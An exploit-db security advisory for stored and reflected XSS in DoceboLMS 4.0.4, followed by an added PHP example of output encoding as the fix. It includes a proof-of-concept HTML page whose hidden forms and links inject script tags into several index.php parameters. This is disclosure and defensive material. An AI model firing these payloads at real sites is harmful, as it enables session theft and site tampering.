DoceboLms 4.0.4 – ‘index.php’ Multiple HTML Injection Vulnerabilities

  • Author: LiquidWorm
    Date: 2011-04-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/35564/
  • source: https://www.securityfocus.com/bid/47150/info
    
    DoceboLMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
    
    Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
    
    DoceboLMS 4.0.4 is vulnerable; other versions may also be affected. 
    
    <html>
    <title>DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities</title>
    <body bgcolor="#1C1C1C">
    <script type="text/javascript">
    function xss1(){document.forms["xss1"].submit();}
    function xss2(){document.forms["xss2"].submit();}
    </script>
    
    <br /><br />
    
    <form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=preassessment&op=modassessment" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
    <input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
    <input type="hidden" name="code" value='"><script>alert(1)</script>' />
    <input type="hidden" name="description" value="ZSL" />
    <input type="hidden" name="id_assess" value="0" />
    <input type="hidden" name="name" value='"><script>alert(2)</script>' />
    <input type="hidden" name="save" value="Save changes" /></form>
    <a href="javascript: xss1();" style="text-decoration:none">
    <b><font color="red"><center><h3>Exploit PreAssessment Module!</h3></center></font></b></a><br /><br />
    
    <form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=news&op=savenews" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
    <input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
    <input type="hidden" name="language" value="2" />
    <input type="hidden" name="long_desc" value="" />
    <input type="hidden" name="news" value="Insert" />
    <input type="hidden" name="short_desc" value="ZSL" />
    <input type="hidden" name="title" value='"><script>alert(1)</script>' /></form>
    <a href="javascript: xss2();" style="text-decoration:none">
    <b><font color="red"><center><h3>Exploit News Module!</h3></center></font></b></a><br /><br />
    
    <a href="http://www.example.com/DoceboLMS_404/index.php?<script>alert(1)</script>" style="text-decoration:none">
    <b><font color="red"><center><h3>Exploit URI XSS #1</h3></center></font></b></a><br /><br />
    
    <a href="http://www.example.com/DoceboLMS_404/?<script>alert(1)</script>" style="text-decoration:none">
    <b><font color="red"><center><h3>Exploit URI XSS #2</h3></center></font></b></a><br /><br />
    
    <a href="http://www.example.com/DoceboLMS_404/docebolms/index.php/index.php?<script>alert(1)</script>" style="text-decoration:none">
    <b><font color="red"><center><h3>Exploit URI XSS #3</h3></center></font></b></a><br /><br />
    
    <a href="http://www.example.com/DoceboLMS_404/docebolms/?<script>alert(1)</script>" style="text-decoration:none">
    <b><font color="red"><center><h3>Exploit URI XSS #4</h3></center></font></b></a><br /><br />
    
    </body></html>
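
The fix for this class of flaw is context-aware encoding at output time. The PHP below is an added example, not DoceboLMS code and not part of the original advisory: it puts an unencoded field renderer beside an encoded one and runs the advisory's own test string through both. The function names are hypothetical, and it assumes the `code`, `name` and `title` values and the request URI are written into double-quoted HTML attributes.

```php
<?php
declare(strict_types=1);

// Added example. Function names are hypothetical; this is not DoceboLMS code.

/** Encode a string for an HTML text or quoted-attribute context. */
function h(string $s): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Unencoded pattern: the submitted value is concatenated into markup. */
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

/** Same field with every dynamic part encoded at output time. */
function render_field_safe(string $name, string $value): string
{
    return '<input type="text" name="' . h($name) . '" value="' . h($value) . '" />';
}

/** The URI cases: the request URI reflected into a link, encoded. */
function render_self_link_safe(string $requestUri): string
{
    return '<a href="' . h($requestUri) . '">reload</a>';
}

/** Regression check: does the rendered fragment still carry the input verbatim? */
function contains_raw_input(string $fragment, string $input): bool
{
    return $input !== '' && strpos($fragment, $input) !== false;
}

// Constructed inputs: the test string and parameter names used in the advisory.
$probe = '"><script>alert(1)</script>';
$uri   = '/DoceboLMS_404/index.php?<script>alert(1)</script>';

foreach (['code', 'name', 'title'] as $param) {
    $unsafe = contains_raw_input(render_field_unsafe($param, $probe), $probe);
    $safe   = contains_raw_input(render_field_safe($param, $probe), $probe);
    printf("%-5s raw input in output: unsafe=%s safe=%s\n",
        $param, var_export($unsafe, true), var_export($safe, true));
}
echo render_field_safe('title', $probe), "\n";
echo render_self_link_safe($uri), "\n";
```

Encoding is applied where the value is written into the page, so stored data stays as submitted and each output context gets its own encoder.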